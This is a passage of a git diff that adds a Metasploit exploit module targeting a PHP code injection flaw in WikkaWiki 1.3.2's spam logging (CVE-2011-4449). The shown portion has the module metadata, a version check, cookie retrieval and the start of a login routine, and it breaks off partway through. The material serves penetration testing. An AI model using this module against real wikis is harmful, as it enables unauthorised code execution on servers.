diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb new file mode 100644 index 0000000000..fa6f1f6c45 --- /dev/null +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -0,0 +1,235 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "WikkaWiki 1.3.2 Spam Logging PHP Injection", + 'Description' => %q{ + This module exploits a vulnerability found in WikkaWiki. When the spam logging + feature is enabled, it is possible to inject PHP code into the spam log file, and + then request it to execute our payload. There are at least three different ways + to trigger spam protection, this module does so by generating 10 fake URLs in a + comment (by default, the max_new_comment_urls parameter is 6). + + Please note that in order to use the injection, you must manually pick a page + first that allows you to add a comment, and then set it as 'PAGE'. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'EgiX', #Initial discovery, PoC + 'sinn3r' #Metasploit + ], + 'References' => + [ + ['CVE', '2011-4449'], + ['OSVDB', '77391'], + ['EDB', '18177'], + ['URL', 'http://wush.net/trac/wikka/ticket/1098'] + ], + 'Payload' => + { + 'BadChars' => "\x00" + }, + 'DefaultOptions' => + { + 'ExitFunction' => "none" + }, + 'Arch' => ARCH_PHP, + 'Platform' => ['php'], + 'Targets' => + [ + ['WikkaWiki 1.3.2 r1814', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Nov 30 2011", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('USERNAME', [true, 'WikkaWiki username']), + OptString.new('PASSWORD', [true, 'WikkaWiki password']), + OptString.new('PAGE', [true, 'Page to inject']), + OptString.new('TARGETURI', [true, 'The URI path to WikkaWiki', '/wikka/']) + ], self.class) + end + + + def check + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "#{target_uri.path}wikka.php?wakka=HomePage" + }) + + if res and res.body =~ /Powered by WikkaWiki/ + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + + # + # Get the cookie before we do any of that login/exploity stuff + # + def get_cookie + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "#{@base}wikka.php" + }) + + # Get the cookie in this format: + # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka + if res and res.headers['Set-Cookie'] + cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0] + else + raise RuntimeError, "#{@peer} - No cookie found, will not continue" + end + + cookie + end + + + # + # Do login, and then return the cookie that contains our credential + # + def login(cookie) + # Send a request to the login page so we can obtain some hidden values needed for login + uri = "#{@base}wikka.php?wakka=UserSettings" + res = send_request_raw({ + 'method' => 'GET', + 'uri' => uri, + 'cookie' => cookie + }) + + # Extract the hidden fields + login = {} + if res and res.body =~ /\